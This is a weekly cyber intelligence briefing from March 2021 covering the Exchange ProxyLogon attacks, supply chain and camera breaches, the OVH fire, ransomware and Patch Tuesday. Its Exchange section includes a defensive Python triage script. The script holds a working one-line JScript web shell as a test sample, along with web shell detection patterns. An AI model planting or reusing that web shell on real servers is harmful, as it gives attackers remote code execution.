
Cyber Intelligence Briefing: 12 March 2021

Billy Gouveia, Mona Damian 12 March 2021


The S-RM Cyber Intelligence Briefing is a weekly round-up of the latest cyber security news, trends and indicators, curated by our intelligence specialists.

Microsoft Exchange servers under attack 

  • Besides the Chinese actor HAFNIUM, at least 10 APT groups are reportedly hunting for unpatched Exchange servers.[1] The list of victims continues to grow, and more than 46,000 internet-facing servers are still unpatched.[2]
  • What to do now: 1) Patch: apply Microsoft’s March 2021 Exchange security updates and keep tracking its follow-up releases;[3] 2) Scan: Microsoft has updated its Safety Scanner (MSERT) to detect the web shells dropped in the Exchange attacks;[4] 3) Investigate: if you find signs that the vulnerabilities were exploited, conduct a forensic investigation. Patching closes the entry point but does not remove web shells or other persistence an attacker has already put in place.

So what? Time-critical patching and scanning for indicators of compromise have never been more important. Read S-RM’s additional advice on the Exchange ProxyLogon vulnerabilities.
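The "Scan" and "Investigate" steps above, as an added triage example that is not code from S-RM or Microsoft and is no substitute for running MSERT. It assumes the Exchange HttpProxy log can be read as CSV once its leading "#" comment lines are dropped, and that the CVE-2021-26855 indicator is the one in Microsoft’s published HAFNIUM guidance: an unauthenticated request whose AnchorMailbox field starts with "ServerInfo~" and contains a "/". The log lines, the one-line JScript web shell and the benign ASPX page below are constructed for illustration; the web shell heuristics are deliberately narrow (request input fed to an evaluator or a process launcher) so that ordinary OWA/ECP pages do not match.

```python
"""Triage helpers for the 'Scan' and 'Investigate' steps: flag ProxyLogon
SSRF requests in an HttpProxy log and spot newly written ASPX web shells.

Added example, not S-RM's or Microsoft's code. Field names and the
CVE-2021-26855 indicator follow Microsoft's public HAFNIUM guidance; every
log line and page snippet here is constructed.
"""
import csv
import io
import os
import re

# Constructed sample of an Exchange HttpProxy log: a header row plus four
# requests. Columns are a subset of the real log's fields.
SAMPLE_HTTPPROXY_LOG = """DateTime,RequestId,UrlStem,AuthenticationType,IsAuthenticated,AuthenticatedUser,AnchorMailbox,ClientIpAddress,HttpStatus
2021-03-03T09:12:01.123Z,a1,/owa/auth/x.js,,false,,ServerInfo~mail.example.com/autodiscover/autodiscover.xml,203.0.113.7,200
2021-03-03T09:12:05.456Z,a2,/ecp/y.js,,false,,ServerInfo~mail.example.com/ecp/default.flt,203.0.113.7,200
2021-03-03T09:15:44.000Z,a3,/owa/,Basic,true,EXAMPLE\\jdoe,Sid~S-1-5-21-1-2-3-1001,198.51.100.20,200
2021-03-03T09:16:10.000Z,a4,/owa/,,false,,,198.51.100.21,401
"""

# Constructed samples: a one-line JScript web shell and a benign page.
SAMPLE_WEBSHELL = ('<%@ Page Language="Jscript"%>'
                   '<%eval(Request.Item["pwd"],"unsafe");%>')
SAMPLE_BENIGN_ASPX = ('<%@ Page Language="C#" %>\n'
                      '<html><body><form runat="server">'
                      '<asp:Label ID="lbl" runat="server" Text="Hello" />'
                      '</form></body></html>')


def load_httpproxy_log(text):
    """Parse HttpProxy CSV text into dicts keyed by the header row, skipping
    the '#Software'/'#Fields' comment lines that precede it in real files."""
    body = "\n".join(l for l in text.splitlines() if not l.startswith("#"))
    return list(csv.DictReader(io.StringIO(body)))


def find_proxylogon_ssrf(rows):
    """Return rows matching the CVE-2021-26855 SSRF indicator: no
    authenticated user, yet an AnchorMailbox naming a backend host and path
    ('ServerInfo~<host>/<path>')."""
    hits = []
    for row in rows:
        user = (row.get("AuthenticatedUser") or "").strip()
        anchor = (row.get("AnchorMailbox") or "").strip()
        if not user and anchor.startswith("ServerInfo~") and "/" in anchor:
            hits.append(row)
    return hits


# Heuristics for ASPX web shells: request-supplied input handed to a code
# evaluator, or a process being spawned from page code.
WEBSHELL_PATTERNS = [
    re.compile(r"\beval\s*\(\s*Request\b", re.I),            # eval(Request[...])
    re.compile(r'\bRequest\b[^;\n]{0,80}"unsafe"', re.I),     # JScript eval(..., "unsafe")
    re.compile(r"\bProcess\s*\.\s*Start\s*\(", re.I),         # spawning a process
]


def webshell_indicators(source):
    """Return the patterns (as strings) that match an ASPX page's source."""
    return [p.pattern for p in WEBSHELL_PATTERNS if p.search(source)]


def find_recent_aspx(root, since_epoch):
    """Walk an IIS/Exchange web root and return (path, indicators) for every
    .aspx file modified after 'since_epoch', e.g. the date the server was
    first exposed to the attacks."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".aspx"):
                continue
            path = os.path.join(dirpath, name)
            if os.path.getmtime(path) < since_epoch:
                continue
            with open(path, "r", errors="replace") as fh:
                findings.append((path, webshell_indicators(fh.read())))
    return findings


if __name__ == "__main__":
    for hit in find_proxylogon_ssrf(load_httpproxy_log(SAMPLE_HTTPPROXY_LOG)):
        print("SSRF indicator:", hit["DateTime"], hit["ClientIpAddress"],
              hit["AnchorMailbox"])
    print("Web shell indicators:", webshell_indicators(SAMPLE_WEBSHELL))
```

In practice you would point load_httpproxy_log at the files under the Exchange installation's Logging\HttpProxy folder and find_recent_aspx at the OWA/ECP auth directories and the IIS aspnet_client folder, then treat any hit as grounds for the forensic investigation in step 3 rather than as proof of compromise on its own.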

Airline’s supply chain breach takes off  

  • SITA, an IT provider to around 400 companies in the airline industry, suffered a coordinated supply chain attack. The adversaries compromised frequent flyer data belonging to over 580,000 passengers; according to the affected airlines, no passwords, email addresses or credit card details were exposed.[5]
  • Singapore Airlines was also impacted despite not being a SITA customer: the airline had shared a restricted set of frequent flyer data with partner carriers to facilitate verification of membership tier status, and that data was held on SITA’s systems.

So what? Organisations should use their vendor risk management programmes to confirm that suppliers have essential security controls in place, and should know which of their data sits with third parties, including partners’ suppliers they have no direct contract with.

Smile! You’re on camera 

  • A hacker group used leaked administrator credentials to access over 150,000 live surveillance feeds from cameras made by security camera company Verkada.[6] The group found a username and password for a ‘Super Admin’ account exposed publicly on the internet, which gave them root access to the cameras.
  • The group had access to Verkada customers’ complete video archives as well as live feeds. Locations using the affected cameras include prisons, hospitals, schools and a Tesla supplier’s production site.[7]

So what? Organisations should thoroughly review the security of IoT devices, including who holds administrative access to cloud-managed devices on the vendor’s side, and assess what an attacker could see or do if such devices were breached.

OVH datacentres go up in flames 

  • OVH, a cloud computing company, suffered a fire at its Strasbourg facility on Wednesday that destroyed one datacentre and damaged another.[8] Two further datacentres at the site, although not damaged in the fire, were also taken offline.
  • Numerous organisations have been affected, with many OVH customers’ web services rendered inaccessible.[9] Some customers have lost data entirely, with no prospect of recovery.

So what? Even the most advanced cyber security controls cannot protect an organisation from physical incidents like this. The event underscores the importance of regular backups that are tested, stored securely and kept in a separate location from the systems they protect.

Ransomware round-up 

  • The REvil ransomware group has announced plans to use DoS attacks and VoIP calls to victims’ business partners and journalists. Both tactics are intended to exert additional pressure on victims to pay a ransom.[10]
  • Ryuk ransomware hit the Spanish government’s labour agency, affecting 700 offices nationwide.[11] The Spanish government has extended deadlines for benefits applications while systems are out of service. We reported on Ryuk last week.
  • A third French hospital in four weeks has suffered a ransomware attack.[12] The hospital’s system for monitoring medicine supplies is affected, at a crucial time in France’s COVID-19 vaccination rollout.

So what? Update your ransomware plans and playbooks to cover DoS attacks and phone calls to your partners, customers and the press, so that communications teams are not caught off guard. Ransomware remains a top threat across all sectors.

Phishing campaign leverages Google reCAPTCHA  

  • A new phishing campaign aims to steal Microsoft Office 365 credentials.[13] A fake Google reCAPTCHA page followed by a personalised Microsoft login page is used to trick victims into disclosing their corporate credentials.
  • Over 2,500 phishing emails have been detected in this campaign, predominantly targeting senior business leaders in the banking and IT sectors.

So what? Phishing campaigns will continue to imitate ‘legitimate’ systems to deceive victims; a CAPTCHA step also keeps automated URL scanners from reaching the credential-harvesting page. Train your employees to identify personalised phishing attempts, and enforce multi-factor authentication so that a stolen password alone is not enough.

Patch Tuesday!  

  • Microsoft released patches for 89 vulnerabilities, 14 of which are rated ‘critical’.[14] Five of the 89 (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 and CVE-2021-26411) are being actively exploited in the wild; the first four are the Exchange Server vulnerabilities covered above.
  • Two Windows 10 updates, KB5000802 and KB5000808, are reportedly causing systems to crash when printing.[15] If affected, uninstalling these two updates alleviates the issue.

So what? Install the patches as soon as possible, but test them on a pilot group first and look out for printing-related issues before rolling them out widely.


References:

[1] Exchange servers under siege from at least 10 APT groups, WeLiveSecurity (ESET), 10 March 2021.

[2] More than 46,000 Exchange servers still unpatched, Recorded Future, 9 March 2021.

[3] Released: March 2021 Exchange Server Security Updates, Microsoft Exchange Team Blog, 2 March 2021.

[4] MSERT tool now finds web shells from Exchange Server attacks, BleepingComputer, 7 March 2021.

[5] SITA supply chain breach hits multiple airlines, ZDNet, 5 March 2021.

[6] Hackers breach thousands of security cameras, exposing Tesla, jails, hospitals, Bloomberg, 9 March 2021.

[7] Tesla says Shanghai factory not hacked after breach of Verkada surveillance cameras, Reuters, 9 March 2021.

[8] Fire at our Strasbourg site, OVHcloud, 10 March 2021.

[9] OVH data center burns down knocking major sites offline, BleepingComputer, 10 March 2021.

[10] Ransomware gang plans to call victim’s business partners about attacks, BleepingComputer, 6 March 2021.

[11] Ryuk ransomware hits 700 Spanish government labor agency offices, BleepingComputer, 10 March 2021.

[12] Third French hospital hit by cyberattack, SecurityWeek, 9 March 2021.

[13] Fake Google reCAPTCHA phishing attack swipes Office 365 passwords, Threatpost, 8 March 2021.

[14] Microsoft Patch Tuesday updates fix 14 critical bugs, Threatpost, 9 March 2021.

[15] Windows 10 crashes when printing due to Microsoft March updates, BleepingComputer, 10 March 2021.
